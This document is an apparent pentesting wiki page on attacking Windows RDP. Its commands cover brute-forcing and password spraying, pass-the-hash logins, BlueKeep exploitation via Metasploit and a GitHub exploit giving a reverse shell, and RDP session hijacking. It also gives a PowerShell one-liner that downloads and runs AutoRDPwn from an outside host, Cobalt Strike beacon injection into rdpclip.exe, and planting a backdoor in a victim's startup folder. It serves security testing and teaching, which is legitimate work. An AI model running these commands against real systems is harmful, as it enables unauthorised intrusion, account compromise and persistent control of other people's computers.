RDP

Pentesting RDP - TCP Port 3389

Theory

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software.

NLA will allow us to authenticate the user before the opening of an RDP session, thus avoiding unnecessary demands on the server if the person cannot authenticate. The CredSSP protocol is used for authentication.

Practice

Enumerate

We can use nmap to enumerate informations about the running RDP server

# Enum NetBIOS, DNS, and OS build version.
nmap -p 3389 --script rdp-ntlm-info <target>

# Enum available encryption and CredSSP (NLA)
nmap -p 3389 --script rdp-enum-encryption <target>

Targeting Accounts

When bruteforcing accounts, you may lock accounts

#Hydra
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>

#NetExec
netexec rdp <IP> -u <userlist> -p <passwlist>

We can use following commands to password spray

#Hydra
hydra -L <userslist> -p 'password123' rdp://<IP>

#NetExec - Spray on target
netexec rdp <IP> -u <userlist> -p 'password123'

#NetExec - Spray on subnet
netexec rdp 10.10.10.0/24 -u <userlist> -p 'password123'

Logging in

We can use xfreerdp to connect into a RDP server with known credentials or using Pass the hash technique.

#With credentials 
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>

#Dynamic screen, clipboard and mount local folder as SMB share on the RDP server  
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP> +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

#Pass the hash
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>

We can use rdesktop to connect into a RDP server with known credentials

rdesktop -d <domain> -u <username> -p <password> <IP>

Using the rdp_check.py script from impacket, we can check if some credentials are valid for a RDP service

python rdp_check.py <domain>/<name>:<password>@<IP>

Using netexec, we can check if some credentials are valid for a RDP service

netexec rdp <IP> -u <user> -p <password>

Headless RDP

Executing commands on a remote host is possible by using a headless (non-GUI) RDP lateral movement technique brought by a tool called SharpRDP.

#Execute commands on DC01 from a compromised system with offense\administrator 
SharpRDP.exe computername=dc01 command=calc username=offense\administrator password=123456

Vulnerabilities

MS12-020 (CVE-2012-0152)

This CVE address a denial of service (DOS) vulnerability in the Remote Desktop Service.

Tools like nmap can be used to detect the presence of the CVE-2012-0152 vulnerability without crashing the target.

nmap -sV --script=rdp-vuln-ms12-020 -p 3389 <target>

We can use this python exploit (do not forget to change the hardcoded IP)

python2.7 ms12-020.py

BlueKeep - CVE-2019-0708

RDP uses "virtual channels", configured before authentication, as a data path between the client and server for providing extensions. RDP 5.1 defines 32 "static" virtual channels, and "dynamic" virtual channels are contained within one of these static channels. If a server binds the virtual channel "MS_T120" (a channel for which there is no legitimate reason for a client to connect to) with a static channel other than 31, heap corruption occurs that allows for arbitrary code execution at the system level.

Bluekeep or CVE-2019-0708 is an RCE exploit that effects the following versions of Windows systems:

Windows 2003
Windows XP
Windows Vista
Windows 7
Windows Server 2008
Windows Server 2008 R2

Windows 8,10,11, Windows Server 2012 and above are not affected

If the target uses RDP and the Windows version is mentioned above, it is vulnerable.

# Check OS version & RDP service using nmap
nmap -O -p 3389 <TARGET_IP>

Alternatively, we can use the rdp_detect_info.py from worawit github to detect the vulnerability

python rdp_detect_info.py <TARGET_IP>

Additionally, we can use metasploit to scan a target

msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf> set RHOST <TARGET_IP>
msf> run

To exploit, we may use the RICSecLab exploit on GitHub to gain a revers shell

This exploit have been made for Windows 7 targets

Exploit may cause the system to crash

#Build your environment
git clone https://github.com/RICSecLab/CVE-2019-0708 && cd CVE-2019-0708
git clone https://github.com/gosecure/pyrdp.git && cd pyrdp
python3 -m venv venv
source venv/bin/activate
pip3 install -U pip setuptools wheel
pip3 install -U -e '.[full]'
cd ..
rm exploit.py
wget https://raw.githubusercontent.com/yassineaboukir/CVE-2019-0708/4f4ff5a9eef5ed4cda92376b25667fd5272d9753/exploit.py

#Exploit
python exploit.py <TARGET_IP> -rp <RDP_PORT> <ATTACKING_IP> -bp <ATTACKING_PORT>

We can easily exploit this vulnerability using a metasploit frameworks

msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf> show targets
msf> set target <TARGET-ID>
msf> set RHOST <TARGET_IP>
msf> show options 
[...]
msf> exploit

Session stealing

With SYSTEM permissions you can access any opened RDP session by any user without need to know the password of the owner. It only use Windows tools and features.

On the target system:

#Get openned sessions
query user

#Access to the selected session
tscon <ID> /dest:<SESSIONNAME>

When you access an active RDP sessions you will kickoff the user that was using it.

We can perform this attack with mimikatz

mimikatz> ts::sessions        #Get sessions
mimikatz> ts::remote /id:2    #Connect to the session

Shadow Attack

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself. More info here

#Local execution one-liner
powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

#From target on reverseshell - create the AutoRDPwn:AutoRDPwn user (mmay try w/o admin rights with -noadmin)
powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
#Connect to shadow sessions with created credentials
mstsc /v win10pro /admin /shadow:1 /control /noconsentprompt /prompt /f

RDP Process Injection (rdpclip.exe)

If someone from a different domain or with better privileges login via RDP to the PC where you are an Admin, you can inject your beacon in his RDP session process and act as him.

# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
 PID   PPID  Name                         Arch  Session     User
 ---   ----  ----                         ----  -------     -----
 ...
 4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user

If a user access via RDP into a machine where an attacker is waiting for him with admin privileges, the attacker will be able to inject a beacon in the RDP session of the user and if the victim mounted his drive when accessing via RDP, the attacker could access it.

In this case you could just compromise the victims original computer by writing a backdoor in the statup folder.

# Wait til someone logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
 PID   PPID  Name                         Arch  Session     User
 ---   ----  ----                         ----  -------     -----
 ...
 4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local

# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     02/10/2021 04:11:30   $Recycle.Bin
          dir     02/10/2021 03:23:44   Boot
          dir     02/20/2021 10:15:23   Config.Msi
          dir     10/18/2016 01:59:39   Documents and Settings
          [...]

# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe

Persistence - Sticky Keys & Utilmans

Using stickykeys or utilman as a persistence vetcor, you will be able to access a administrative CMD and any RDP session anytime

Accessibility features Backdoor

Resources

BlueKeep (CVE-2019-0708) & Metasploit

Lateral Movement over headless RDP with SharpRDPRed Team Notes

RDP Sessions AbuseHackTricks

3389 - Pentesting RDPHackTricks

Last updated 10 months ago

Was this helpful?